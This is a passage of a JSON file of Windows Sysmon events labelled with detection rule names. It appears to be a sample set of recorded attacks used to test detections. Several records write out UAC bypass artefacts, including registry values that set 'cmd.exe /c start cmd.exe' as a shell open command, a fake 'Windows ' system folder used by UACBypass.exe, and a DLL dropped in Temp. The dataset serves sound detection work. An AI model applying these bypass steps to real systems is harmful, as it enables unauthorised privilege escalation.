Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-0010F76F1300","ProcessId":3964,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 
02:32:48.342"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17717,"Execution":{"#attributes":{"ProcessID":2024,"ThreadID":2004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T02:32:48.359432Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:46:10.344","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FC52-5CD6-0000-0010357F1200","ProcessId":3812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:46:10.344"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15970,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:46:10.344282Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:46:15.484","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FC57-5CD6-0000-00101FAF1200","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:46:15.484"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15972,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:46:15.547407Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-001031A90F04","ProcessId":1768,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 
10:16:31.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5944,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:31.476803Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-0010F1B20F04","ProcessId":2444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:31.572"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5946,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:31.609571Z"}},"Version":2}}}},{"detection":["Wsreset UAC Bypass","Bypass UAC via WSReset.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c start C:\\Windows\\system32\\cmd.exe","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\WSReset.exe\" ","ParentImage":"C:\\Windows\\System32\\WSReset.exe","ParentProcessGuid":"747F3D96-B080-5D46-0000-0010D4EA0F04","ParentProcessId":2112,"ProcessGuid":"747F3D96-B091-5D46-0000-001081F71104","ProcessId":820,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 10:16:49.960"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5950,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:50.009124Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E1321204","ProcessId":1960,"RuleName":"PrivEsc - UAC bypass 
UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:55.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5953,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:55.441262Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E7381204","ProcessId":3444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:55.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5955,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:55.643799Z"}},"Version":2}}}},{"detection":["TrustedPath UAC Bypass 
Pattern"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-D21D-5D3C-0000-0020DD5C2300","LogonId":"0x235cdd","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39D-5D3C-0000-0010131E5600","ProcessId":7128,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:41.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4727,"Execution":{"#attributes":{"ProcessID":2748,"ThreadID":3376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-27T22:43:42.033042Z"}},"Version":5}}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D21D-5D3C-0000-0020EE5B2300","LogonId":"0x235bee","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:42.354"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4730,"Execution":{"#attributes":{"ProcessID":2748,"ThreadID":3376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-27T22:43:42.392880Z"}},"Version":5}}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6","Image":"C:\\Windows \\System32\\winSAT.exe","ImageLoaded":"C:\\Windows 
\\System32\\WINMM.dll","ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"?","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-07-27 22:43:42.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4732,"Execution":{"#attributes":{"ProcessID":2748,"ThreadID":3384}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-27T22:43:43.016956Z"}},"Version":3}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-095D-5EB4-0000-001082FF1700","ProcessId":7084,"RuleName":"PrivEsc - T1088 - UACBypass - changepk UACME61","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)","UtcTime":"2020-05-07 13:13:01.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":112814,"Execution":{"#attributes":{"ProcessID":2888,"ThreadID":3384}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-07T13:13:01.683498Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In 
TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 09:50:08.491","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-9AD0-5CD6-0000-001077FC1600","ProcessId":1136,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 09:50:08.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15875,"Execution":{"#attributes":{"ProcessID":2000,"ThreadID":1748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T09:50:08.491568Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 09:50:13.464","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-9AD5-5CD6-0000-0010C4131700","ProcessId":3716,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 
09:50:13.464"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15877,"Execution":{"#attributes":{"ProcessID":2000,"ThreadID":1748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T09:50:13.509892Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-BDD1-5EC9-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-CA4E-5EC9-0000-00109FE23700","ParentProcessId":1516,"ProcessGuid":"747F3D96-CA52-5EC9-0000-001027FA3700","ProcessId":4456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-24 
01:13:54.117"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":196375,"Execution":{"#attributes":{"ProcessID":2812,"ThreadID":3656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-24T01:13:54.120170Z"}},"Version":5}}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 
20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6708}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"POC.exe","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1EB6-5F76-0000-00101DF51D00","ParentProcessId":8072,"ProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ProcessId":4696,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 
18:35:02.413"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410485,"Execution":{"#attributes":{"ProcessID":3308,"ThreadID":4656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-01T18:35:02.415351Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Program","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"AppContainer","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"POC.exe","ParentImage":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","ParentProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ParentProcessId":4696,"ProcessGuid":"747F3D96-2156-5F76-0000-00100EEC2500","ProcessId":5448,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 
18:35:02.605"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410486,"Execution":{"#attributes":{"ProcessID":3308,"ThreadID":4656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-01T18:35:02.606952Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-01 18:35:02.768","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1903-5F76-0000-0010B85E0900","ProcessId":6932,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\abc.txt","UtcTime":"2020-10-01 18:35:02.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":410487,"Execution":{"#attributes":{"ProcessID":3308,"ThreadID":4656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-01T18:35:02.775302Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft 
